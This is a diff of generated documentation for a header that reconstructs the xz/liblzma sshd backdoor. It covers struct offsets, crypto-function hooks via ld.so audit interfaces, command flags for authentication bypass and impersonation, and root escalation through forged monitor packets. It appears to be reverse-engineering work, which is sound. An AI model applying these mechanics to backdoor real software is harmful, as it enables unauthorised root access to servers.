ReturnsBOOL TRUE if successful, FALSE if modifications couldn't be applied
+
+
+
+◆ sshd_proxy_elevate()
+
+
+
+
+
forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges through the sshd monitor.
+
this function is called if the calling function, run_backdoor_commands , is invoked without root (which is what normally happens when sshd is sandboxed)
+
the code will then construct a new packet and send a monitor request with type MONITOR_REQ_KEYALLOWED and the payload as key. the receiving end (mm_answer_keyallowed) will then run the payload, likely as soon as RSA_get0_key is invoked, through the hook (TODO: confirm this)
+
the disable_backdoor flag is used to avoid running the payload more than once, in case of multiple calls
+
- Parameters
-
+
+ | args | arguments used to build the SSH packet |
+ | ctx | the global context |
+
+
+
+
- Returns
- BOOL TRUE if the packet was sent successfully, FALSE otherwise
+
977 struct monitor **struct_monitor_ptr_address;
-
-
-
-
-
-
-
-
-
-
- 1020 u8 shift_operations[31];
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1048 PADDING(
sizeof(
void*));
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1152 void (*_dl_audit_symbind_alt)(
struct link_map *l,
const ElfW(Sym) *ref,
void **value, lookup_t result);
-
- 1162 pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
- 1168 pfn_RSA_public_decrypt_t hook_EVP_PKEY_set1_RSA;
- 1173 pfn_RSA_get0_key_t hook_RSA_get0_key;
-
- 1175 u64 hooks_installed;
-
-
- 1178 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_ptr, 0x40);
- 1179 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_old_value, 0x48);
- 1180 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_ptr, 0x50);
- 1181 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_old_value, 0x58);
- 1182 assert_offset(
ldso_ctx_t, sshd_link_map_l_audit_any_plt_addr, 0x60);
- 1183 assert_offset(
ldso_ctx_t, link_map_l_audit_any_plt_bitmask, 0x68);
- 1184 assert_offset(
ldso_ctx_t, _dl_audit_ptr, 0x70);
- 1185 assert_offset(
ldso_ctx_t, _dl_naudit_ptr, 0x78);
- 1186 assert_offset(
ldso_ctx_t, hooked_audit_ifaces, 0x80);
-
- 1188 assert_offset(
ldso_ctx_t, libcrypto_l_name, 0xF8);
- 1189 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt, 0x100);
- 1190 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt__size, 0x108);
- 1191 assert_offset(
ldso_ctx_t, hook_RSA_public_decrypt, 0x110);
- 1192 assert_offset(
ldso_ctx_t, hook_EVP_PKEY_set1_RSA, 0x118);
- 1193 assert_offset(
ldso_ctx_t, hook_RSA_get0_key, 0x120);
-
- 1195 assert_offset(
ldso_ctx_t, hooks_installed, 0x130);
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1218 uintptr_t (*symbind64)(
- 1219 Elf64_Sym *sym,
unsigned int ndx,
- 1220 uptr *refcook, uptr *defcook,
- 1221 unsigned int flags,
const char *symname);
- 1222 pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
- 1223 pfn_RSA_get0_key_t hook_RSA_get0_key;
-
- 1228 PADDING(
sizeof(
void *));
- 1229 PADDING(
sizeof(
void *));
-
-
- 1238 PADDING(
sizeof(
void *));
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1291 Elf64_Ehdr *dynamic_linker_ehdr;
- 1292 void **__libc_stack_end;
-
-
-
- 1296 assert_offset(
main_elf_t, dynamic_linker_ehdr, 0x8);
-
-
-
+
+
+
+
+
+
+
+ 979 struct monitor **struct_monitor_ptr_address;
+
+
+
+
+
+
+
+
+
+
+ 1022 u8 shift_operations[31];
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1050 PADDING(
sizeof(
void*));
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1154 void (*_dl_audit_symbind_alt)(
struct link_map *l,
const ElfW(Sym) *ref,
void **value, lookup_t result);
+
+ 1164 pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
+ 1170 pfn_RSA_public_decrypt_t hook_EVP_PKEY_set1_RSA;
+ 1175 pfn_RSA_get0_key_t hook_RSA_get0_key;
+
+ 1177 u64 hooks_installed;
+
+
+ 1180 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_ptr, 0x40);
+ 1181 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_old_value, 0x48);
+ 1182 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_ptr, 0x50);
+ 1183 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_old_value, 0x58);
+ 1184 assert_offset(
ldso_ctx_t, sshd_link_map_l_audit_any_plt_addr, 0x60);
+ 1185 assert_offset(
ldso_ctx_t, link_map_l_audit_any_plt_bitmask, 0x68);
+ 1186 assert_offset(
ldso_ctx_t, _dl_audit_ptr, 0x70);
+ 1187 assert_offset(
ldso_ctx_t, _dl_naudit_ptr, 0x78);
+ 1188 assert_offset(
ldso_ctx_t, hooked_audit_ifaces, 0x80);
+
+ 1190 assert_offset(
ldso_ctx_t, libcrypto_l_name, 0xF8);
+ 1191 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt, 0x100);
+ 1192 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt__size, 0x108);
+ 1193 assert_offset(
ldso_ctx_t, hook_RSA_public_decrypt, 0x110);
+ 1194 assert_offset(
ldso_ctx_t, hook_EVP_PKEY_set1_RSA, 0x118);
+ 1195 assert_offset(
ldso_ctx_t, hook_RSA_get0_key, 0x120);
+
+ 1197 assert_offset(
ldso_ctx_t, hooks_installed, 0x130);
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1220 uintptr_t (*symbind64)(
+ 1221 Elf64_Sym *sym,
unsigned int ndx,
+ 1222 uptr *refcook, uptr *defcook,
+ 1223 unsigned int flags,
const char *symname);
+ 1224 pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
+ 1225 pfn_RSA_get0_key_t hook_RSA_get0_key;
+
+ 1230 PADDING(
sizeof(
void *));
+ 1231 PADDING(
sizeof(
void *));
+
+
+ 1240 PADDING(
sizeof(
void *));
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1293 Elf64_Ehdr *dynamic_linker_ehdr;
+ 1294 void **__libc_stack_end;
+
+
+
+ 1298 assert_offset(
main_elf_t, dynamic_linker_ehdr, 0x8);
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
-
-
-
- 1360 struct link_map *liblzma_map;
- 1361 struct link_map *libcrypto_map;
- 1362 struct link_map *libsystemd_map;
- 1363 struct link_map *libc_map;
-
-
+
+
+
+
+
+ 1362 struct link_map *liblzma_map;
+ 1363 struct link_map *libcrypto_map;
+ 1364 struct link_map *libsystemd_map;
+ 1365 struct link_map *libc_map;
-
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1496 typedef union __attribute__((packed)) {
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1534 CMDF_AUTH_BYPASS = 0x4,
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1581 u8 decrypted_secret_data[57];
-
-
-
-
-
-
- 1588 assert_offset(
key_ctx_t, payload, 0x15);
- 1589 static_assert(
sizeof(
key_ctx_t) == 0x2B8);
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1637 PADDING(
sizeof(u64));
-
- 1644 PADDING(
sizeof(u64));
- 1645 PADDING(
sizeof(u64));
-
- 1652 PADDING(
sizeof(u64));
-
-
-
-
-
-
-
-
-
- 1667 PADDING(
sizeof(u64));
- 1668 lzma_allocator allocator;
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1698 u8 *output_register;
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1723 const BIGNUM *rsa_n;
- 1724 const BIGNUM *rsa_e;
-
- 1726 u16 payload_body_size;
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1824 BOOL is_64bit_operand,
-
-
-
-
-
-
-
- 1847 BOOL is_64bit_operand,
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1913 EncodedStringId encoded_string_id,
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 1967 FuncFindType find_mode);
-
-
-
-
-
-
-
- 2005 extern char *check_argument(
char arg_first_char,
char* arg_name);
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 2118 EncodedStringId encoded_string_id);
-
-
-
-
-
-
- 2152 StringXrefId xref_id,
- 2153 void **pOutCodeStart,
void **pOutCodeEnd,
-
-
-
-
-
-
- 2172 EncodedStringId *stringId_inOut,
- 2173 void *rodata_start_ptr);
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 2243 unsigned shift_count, BOOL start_from_call);
-
-
-
- 2257 unsigned operation_index,
- 2258 unsigned shift_count,
- 2259 int flags, u8 *code);
-
-
-
-
- 2274 unsigned shift_count,
unsigned operation_index);
-
-
- 2319 u8 *call_site, u8 *code,
-
- 2321 unsigned shift_count,
unsigned operation_index);
-
-
-
- 2336 unsigned shift_count,
unsigned operation_index,
-
-
-
-
-
-
-
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1498 typedef union __attribute__((packed)) {
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1536 CMDF_AUTH_BYPASS = 0x4,
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1583 u8 decrypted_secret_data[57];
+
+
+
+
+
+
+ 1590 assert_offset(
key_ctx_t, payload, 0x15);
+ 1591 static_assert(
sizeof(
key_ctx_t) == 0x2B8);
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1639 PADDING(
sizeof(u64));
+
+ 1646 PADDING(
sizeof(u64));
+ 1647 PADDING(
sizeof(u64));
+
+ 1654 PADDING(
sizeof(u64));
+
+
+
+
+
+
+
+
+
+ 1669 PADDING(
sizeof(u64));
+ 1670 lzma_allocator allocator;
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1700 u8 *output_register;
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1725 const BIGNUM *rsa_n;
+ 1726 const BIGNUM *rsa_e;
+
+ 1728 u16 payload_body_size;
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1837 BOOL is_64bit_operand,
+
+
+
+
+
+
+
+ 1860 BOOL is_64bit_operand,
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1926 EncodedStringId encoded_string_id,
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 1980 FuncFindType find_mode);
+
+
+
+
+
+
+
+ 2018 extern char *check_argument(
char arg_first_char,
char* arg_name);
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2131 EncodedStringId encoded_string_id);
+
+
+
+
+
+
+ 2165 StringXrefId xref_id,
+ 2166 void **pOutCodeStart,
void **pOutCodeEnd,
+
+
+
+
+
+
+ 2185 EncodedStringId *stringId_inOut,
+ 2186 void *rodata_start_ptr);
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2256 unsigned shift_count, BOOL start_from_call);
+
+
+
+ 2270 unsigned operation_index,
+ 2271 unsigned shift_count,
+ 2272 int flags, u8 *code);
+
+
+
+
+ 2287 unsigned shift_count,
unsigned operation_index);
+
+
+ 2332 u8 *call_site, u8 *code,
+
+ 2334 unsigned shift_count,
unsigned operation_index);
+
+
+
+ 2349 unsigned shift_count,
unsigned operation_index,
+
+
+
+
+
+
-
+
-
-
-
-
-
-
-
- 2448 struct link_map *libc,
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 2525 extern EncodedStringId
get_string_id(
const char *string_begin,
const char *string_end);
+
+
+
+
+
+
+
+
+
+ 2461 struct link_map *libc,
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
- 2566 extern unsigned int _get_cpuid_modified(
unsigned int leaf,
unsigned int *eax,
unsigned int *ebx,
unsigned int *ecx,
unsigned int *edx, u64 *caller_frame);
-
- 2579 extern void _cpuid_gcc(
unsigned int level,
unsigned int *a,
unsigned int *b,
unsigned int *c,
unsigned int *d);
+ 2538 extern EncodedStringId
get_string_id(
const char *string_begin,
const char *string_end);
+
+ 2579 extern unsigned int _get_cpuid_modified(
unsigned int leaf,
unsigned int *eax,
unsigned int *ebx,
unsigned int *ecx,
unsigned int *edx, u64 *caller_frame);
-
-
-
-
-
-
-
-
-
- 2636 uptr *refcook, uptr *defcook,
-
- 2638 const char *symname);
-
-
+ 2592 extern void _cpuid_gcc(
unsigned int level,
unsigned int *a,
unsigned int *b,
unsigned int *c,
unsigned int *d);
+
+
+
+
+
+
+
+
+
+
+ 2649 uptr *refcook, uptr *defcook,
+
+ 2651 const char *symname);
-
-
- 2669 ptrdiff_t *libname_offset,
-
-
-
-
-
- 2697 ptrdiff_t *libname_offset,
-
-
-
-
-
-
-
-
-
-
-
- 2744 ptrdiff_t libname_offset,
-
-
-
-
-
-
-
-
-
-
-
-
-
- 2787 void **host_keys_out);
-
-
-
-
-
-
- 2808 void **host_keys_out,
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 2878 u8 *buffer, u64 bufferSize,
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 2950 u64 sshkey_digest_offset,
- 2951 u64 signed_data_size,
-
-
-
-
-
-
- 2969 BOOL skip_root_patch,
-
- 2971 BOOL replace_monitor_reqtype,
- 2972 int monitor_reqtype,
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- 3011 enum SocketMode socket_direction
-
-
-
-
-
-
-
-
- 3034 static_assert(
sizeof(global_ctx) == 0x8);
-
-
-
-
-
-
+
+
+
+
+ 2682 ptrdiff_t *libname_offset,
+
+
+
+
+
+ 2710 ptrdiff_t *libname_offset,
+
+
+
+
+
+
+
+
+
+
+
+ 2757 ptrdiff_t libname_offset,
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2800 void **host_keys_out);
+
+
+
+
+
+
+ 2821 void **host_keys_out,
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2891 u8 *buffer, u64 bufferSize,
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 2963 u64 sshkey_digest_offset,
+ 2964 u64 signed_data_size,
+
+
+
+
+
+
+ 2982 BOOL skip_root_patch,
+
+ 2984 BOOL replace_monitor_reqtype,
+ 2985 int monitor_reqtype,
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 3024 enum SocketMode socket_direction
+
+
+
+
+
+
+
+
+ 3047 static_assert(
sizeof(global_ctx) == 0x8);
+
+
+
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
-
-
-ptrdiff_t backdoor_init_stage2_got_offset
offset from the symbol backdoor_init_stage2() to the GOT
Definition: xzre.h:1609
ptrdiff_t cpuid_random_symbol_got_offset
offset from the symbol cpuid_random_symbol to the GOT
Definition: xzre.h:1597
u64 cpuid_got_index
index in the GOT for _cpuid()
Definition: xzre.h:1603
data passed to functions that access the backdoor data
Definition: xzre.h:1304
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1349
libc_imports_t libc_imports
functions imported from libc
Definition: xzre.h:1394
string_references_t string_refs
information about resolved string references and the containing functions boundaries
Definition: xzre.h:1399
struct link_map * main_map
this is for sshd itself
Definition: xzre.h:1354
elf_info_t libc_info
ELF context for libc.so.
Definition: xzre.h:1384
elf_info_t libcrypto_info
ELF context for libcrypto.so.
Definition: xzre.h:1389
elf_info_t dynamic_linker_info
ELF context for ld.so.
Definition: xzre.h:1380
elf_info_t main_info
this is for sshd itself
Definition: xzre.h:1374
lzma_allocator * import_resolver
ELF import resolver (fake LZMA allocator)
Definition: xzre.h:1404
struct link_map * dynamic_linker_map
this is for ld.so
Definition: xzre.h:1359
ptrdiff_t backdoor_init_stage2_got_offset
offset from the symbol backdoor_init_stage2() to the GOT
Definition: xzre.h:1611
ptrdiff_t cpuid_random_symbol_got_offset
offset from the symbol cpuid_random_symbol to the GOT
Definition: xzre.h:1599
u64 cpuid_got_index
index in the GOT for _cpuid()
Definition: xzre.h:1605
data passed to functions that access the backdoor data
Definition: xzre.h:1306
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1351
libc_imports_t libc_imports
functions imported from libc
Definition: xzre.h:1396
string_references_t string_refs
information about resolved string references and the containing functions boundaries
Definition: xzre.h:1401
struct link_map * main_map
this is for sshd itself
Definition: xzre.h:1356
elf_info_t libc_info
ELF context for libc.so.
Definition: xzre.h:1386
elf_info_t libcrypto_info
ELF context for libcrypto.so.
Definition: xzre.h:1391
elf_info_t dynamic_linker_info
ELF context for ld.so.
Definition: xzre.h:1382
elf_info_t main_info
this is for sshd itself
Definition: xzre.h:1376
lzma_allocator * import_resolver
ELF import resolver (fake LZMA allocator)
Definition: xzre.h:1406
struct link_map * dynamic_linker_map
this is for ld.so
Definition: xzre.h:1361
PADDING(sizeof(void *))
set to addess of symbol .Llzma12_mode_map_part_1
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA_plt() in sshd
Definition: xzre.h:1436
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key_plt() in sshd
Definition: xzre.h:1441
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:1431
ptrdiff_t tls_get_addr_plt_offset
offset from the symbol __tls_get_addr() to the PLT
Definition: xzre.h:1623
ptrdiff_t tls_get_addr_random_symbol_got_offset
offset from the symbol tls_get_addr_random_symbol to the GOT
Definition: xzre.h:1629
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA_plt() in sshd
Definition: xzre.h:1438
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key_plt() in sshd
Definition: xzre.h:1443
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:1433
ptrdiff_t tls_get_addr_plt_offset
offset from the symbol __tls_get_addr() to the PLT
Definition: xzre.h:1625
ptrdiff_t tls_get_addr_random_symbol_got_offset
offset from the symbol tls_get_addr_random_symbol to the GOT
Definition: xzre.h:1631
void * symbol_ptr
points to a symbol in memory will be used to find the GOT value
Definition: xzre.h:451
ptrdiff_t got_offset
holds the offset of the symbol relative to the GOT. used to derive the got_ptr
Definition: xzre.h:471
void * cpuid_fn
points to the real cpuid function
Definition: xzre.h:466
u64 * frame_address
stores the value of __builtin_frame_address(0)-16
Definition: xzre.h:475
array of ELF handles
Definition: xzre.h:1266
elf_info_t * dynamic_linker
ELF context for ld.so.
Definition: xzre.h:1277
elf_info_t * main
this is for sshd
Definition: xzre.h:1271
array of ELF handles
Definition: xzre.h:1268
elf_info_t * dynamic_linker
ELF context for ld.so.
Definition: xzre.h:1279
elf_info_t * main
this is for sshd
Definition: xzre.h:1273
u64 code_segment_size
page-aligned virtual size of the first executable ELF segment
Definition: xzre.h:644
u64 first_vaddr
virtual address of the first program header
Definition: xzre.h:573
Elf64_Sym * symtab
pointer to the ELF symbol table
Definition: xzre.h:597
u64 dyn_num_entries
number of entries in the ELF dynamic segment
Definition: xzre.h:589
u32 plt_relocs_num
number of entries in the PLT relocation table
Definition: xzre.h:605
void * lzma_code_end
liblzma code segment end
Definition: xzre.h:1009
void * lzma_code_end
liblzma code segment end
Definition: xzre.h:1011
libc_imports_t * libc_imports
pointer to the structure containing resolved libc functions
Definition: xzre.h:956
char * STR_ssh_rsa_cert_v01_openssh_com
location of sshd .rodata string "ssh-rsa-cert-v01@openssh.com"
Definition: xzre.h:972
BOOL disable_backdoor
This flag gets set to TRUE by run_backdoor_commands if any of the validity checks fail,...
Definition: xzre.h:964
char * STR_ssh_rsa_cert_v01_openssh_com
location of sshd .rodata string "ssh-rsa-cert-v01@openssh.com"
Definition: xzre.h:974
BOOL disable_backdoor
This flag gets set to TRUE by run_backdoor_commands if any of the validity checks fail,...
Definition: xzre.h:966
imported_funcs_t * imported_funcs
pointer to the structure containing resolved OpenSSL functions
Definition: xzre.h:952
void * sshd_data_start
sshd data segment end
Definition: xzre.h:990
u32 num_shifted_bits
number of bits copied
Definition: xzre.h:1024
void * sshd_code_start
sshd code segment start
Definition: xzre.h:982
void * sshd_data_end
sshd data segment start
Definition: xzre.h:994
char * STR_rsa_sha2_256
location of sshd .rodata string "rsa-sha2-256"
Definition: xzre.h:976
void * sshd_code_end
sshd code segment end
Definition: xzre.h:986
void * lzma_code_start
liblzma code segment start
Definition: xzre.h:1002
void * sshd_data_start
sshd data segment end
Definition: xzre.h:992
u32 num_shifted_bits
number of bits copied
Definition: xzre.h:1026
void * sshd_code_start
sshd code segment start
Definition: xzre.h:984
void * sshd_data_end
sshd data segment start
Definition: xzre.h:996
char * STR_rsa_sha2_256
location of sshd .rodata string "rsa-sha2-256"
Definition: xzre.h:978
void * sshd_code_end
sshd code segment end
Definition: xzre.h:988
void * lzma_code_start
liblzma code segment start
Definition: xzre.h:1004
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:760
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key() in sshd
Definition: xzre.h:770
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA() in sshd
Definition: xzre.h:765
BOOL result
TRUE if the instruction sequence was found, FALSE otherwise.
Definition: xzre.h:1703
u8 * offset_to_match
offset to match in the instruction displacement
Definition: xzre.h:1692
u8 * start_addr
start of the code address range to search
Definition: xzre.h:1682
u8 * end_addr
start of the code address range to search
Definition: xzre.h:1687
u32 * output_register_to_match
register to match as the instruction output
Definition: xzre.h:1697
the payload header. also used as Chacha IV
Definition: xzre.h:1476
the contents of the RSA 'n' field
Definition: xzre.h:1491
void * sshd_auditstate_bindflags_ptr
the location of sshd's auditstate::bindflags field
Definition: xzre.h:1088
void * libcrypto_auditstate_bindflags_old_value
backup of the old value of libcrypto's libname_list::next field
Definition: xzre.h:1077
void * libcrypto_auditstate_bindflags_ptr
the location of libcrypto's auditstate::bindflags field
Definition: xzre.h:1072
u8 link_map_l_audit_any_plt_bitmask
bitmask that sets the link_map::l_audit_any_plt flag
Definition: xzre.h:1109
unsigned int * _dl_naudit_ptr
location of ld.so's _rtld_global_ro::_dl_naudit_ptr field
Definition: xzre.h:1128
void * sshd_auditstate_bindflags_old_value
backup of the old value of sshd's libname_list::next field
Definition: xzre.h:1093
char ** libcrypto_l_name
location of libcrypto's link_map::l_name field
Definition: xzre.h:1145
size_t _dl_audit_symbind_alt__size
code size of ld.so's _dl_audit_symbind_alt() function
Definition: xzre.h:1157
struct audit_ifaces ** _dl_audit_ptr
location of ld.so's _rtld_global_ro::_dl_audit_ptr field
Definition: xzre.h:1119
void * sshd_link_map_l_audit_any_plt_addr
location of sshd's link_map::l_audit_any_plt flag
Definition: xzre.h:1102
BOOL result
TRUE if the instruction sequence was found, FALSE otherwise.
Definition: xzre.h:1705
u8 * offset_to_match
offset to match in the instruction displacement
Definition: xzre.h:1694
u8 * start_addr
start of the code address range to search
Definition: xzre.h:1684
u8 * end_addr
start of the code address range to search
Definition: xzre.h:1689
u32 * output_register_to_match
register to match as the instruction output
Definition: xzre.h:1699
the payload header. also used as Chacha IV
Definition: xzre.h:1478
the contents of the RSA 'n' field
Definition: xzre.h:1493
void * sshd_auditstate_bindflags_ptr
the location of sshd's auditstate::bindflags field
Definition: xzre.h:1090
void * libcrypto_auditstate_bindflags_old_value
backup of the old value of libcrypto's libname_list::next field
Definition: xzre.h:1079
void * libcrypto_auditstate_bindflags_ptr
the location of libcrypto's auditstate::bindflags field
Definition: xzre.h:1074
u8 link_map_l_audit_any_plt_bitmask
bitmask that sets the link_map::l_audit_any_plt flag
Definition: xzre.h:1111
unsigned int * _dl_naudit_ptr
location of ld.so's _rtld_global_ro::_dl_naudit_ptr field
Definition: xzre.h:1130
void * sshd_auditstate_bindflags_old_value
backup of the old value of sshd's libname_list::next field
Definition: xzre.h:1095
char ** libcrypto_l_name
location of libcrypto's link_map::l_name field
Definition: xzre.h:1147
size_t _dl_audit_symbind_alt__size
code size of ld.so's _dl_audit_symbind_alt() function
Definition: xzre.h:1159
struct audit_ifaces ** _dl_audit_ptr
location of ld.so's _rtld_global_ro::_dl_audit_ptr field
Definition: xzre.h:1121
void * sshd_link_map_l_audit_any_plt_addr
location of sshd's link_map::l_audit_any_plt flag
Definition: xzre.h:1104
struct monitor from openssh-portable
Definition: xzre.h:390
struct sensitive_data from openssh-portable
Definition: xzre.h:402
struct sshkey from openssh-portable
Definition: xzre.h:413
void * func_start
the starting address of the function that referenced the string
Definition: xzre.h:1321
EncodedStringId string_id
the string that was referenced, in encoded form
Definition: xzre.h:1316
void * xref
location of the instruction that referenced the string
Definition: xzre.h:1329
void * func_end
the ending address of the function that referenced the string
Definition: xzre.h:1325
represents a shift register, which will shift a '1' into the secret data array. the low 3 bits repres...
Definition: xzre.h:1460
u32 index
Definition: xzre.h:1462
u32 byte_index
Definition: xzre.h:1467
u32 bit_index
Definition: xzre.h:1465
void * func_start
the starting address of the function that referenced the string
Definition: xzre.h:1323
EncodedStringId string_id
the string that was referenced, in encoded form
Definition: xzre.h:1318
void * xref
location of the instruction that referenced the string
Definition: xzre.h:1331
void * func_end
the ending address of the function that referenced the string
Definition: xzre.h:1327
represents a shift register, which will shift a '1' into the secret data array. the low 3 bits repres...
Definition: xzre.h:1462
u32 index
Definition: xzre.h:1464
u32 byte_index
Definition: xzre.h:1469
u32 bit_index
Definition: xzre.h:1467
BOOL elf_find_function_pointer(StringXrefId xref_id, void **pOutCodeStart, void **pOutCodeEnd, void **pOutFptrAddr, elf_info_t *elf_info, string_references_t *xrefs, global_context_t *ctx)
this function searches for a function pointer, pointing to a function designated by the given xref_id
BOOL elf_parse(Elf64_Ehdr *ehdr, elf_info_t *elf_info)
Parses the given in-memory ELF file into elf_info.
BOOL process_is_sshd(elf_info_t *elf, u8 *stack_end)
checks if the current process is sshd by inspecting argv and envp.
BOOL find_mov_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
finds a MOV instruction.
ElfId
Definition: xzre.h:214
@ X_ELF_MAIN
this is for sshd itself
Definition: xzre.h:219
CommandFlags2
Definition: xzre.h:1520
@ CMDF_CHANGE_MONITOR_REQ
if set, changes the monitor_reqtype field from MONITOR_REQ_AUTHPASSWORD to what's contained in the pa...
Definition: xzre.h:1530
@ CMDF_PSELECT
executes pselect, then exit not compatible with command 2
Definition: xzre.h:1544
@ CMDF_IMPERSONATE
if set, impersonate a user (info from payload) if not set, impersonate root
Definition: xzre.h:1525
@ CMDF_CONTINUATION
more data available in the following packet not compatible with command 3
Definition: xzre.h:1539
CommandFlags2
Definition: xzre.h:1522
@ CMDF_CHANGE_MONITOR_REQ
if set, changes the monitor_reqtype field from MONITOR_REQ_AUTHPASSWORD to what's contained in the pa...
Definition: xzre.h:1532
@ CMDF_PSELECT
executes pselect, then exit not compatible with command 2
Definition: xzre.h:1546
@ CMDF_IMPERSONATE
if set, impersonate a user (info from payload) if not set, impersonate root
Definition: xzre.h:1527
@ CMDF_CONTINUATION
more data available in the following packet not compatible with command 3
Definition: xzre.h:1541
struct key_payload_hdr key_payload_hdr_t
the payload header. also used as Chacha IV
BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx)
finds a call instruction
BOOL sshd_get_host_keys_address_via_xcalloc(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, string_references_t *string_refs, void **host_keys_out)
finds the address of sensitive_data.host_keys in sshd by using XREF_xcalloc_zero_size in xcalloc
void fake_lzma_free(void *opaque, void *ptr)
a fake free function called by lzma_free()
void * elf_get_rodata_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the last readonly segment in the given ELF file this corresponds to t...
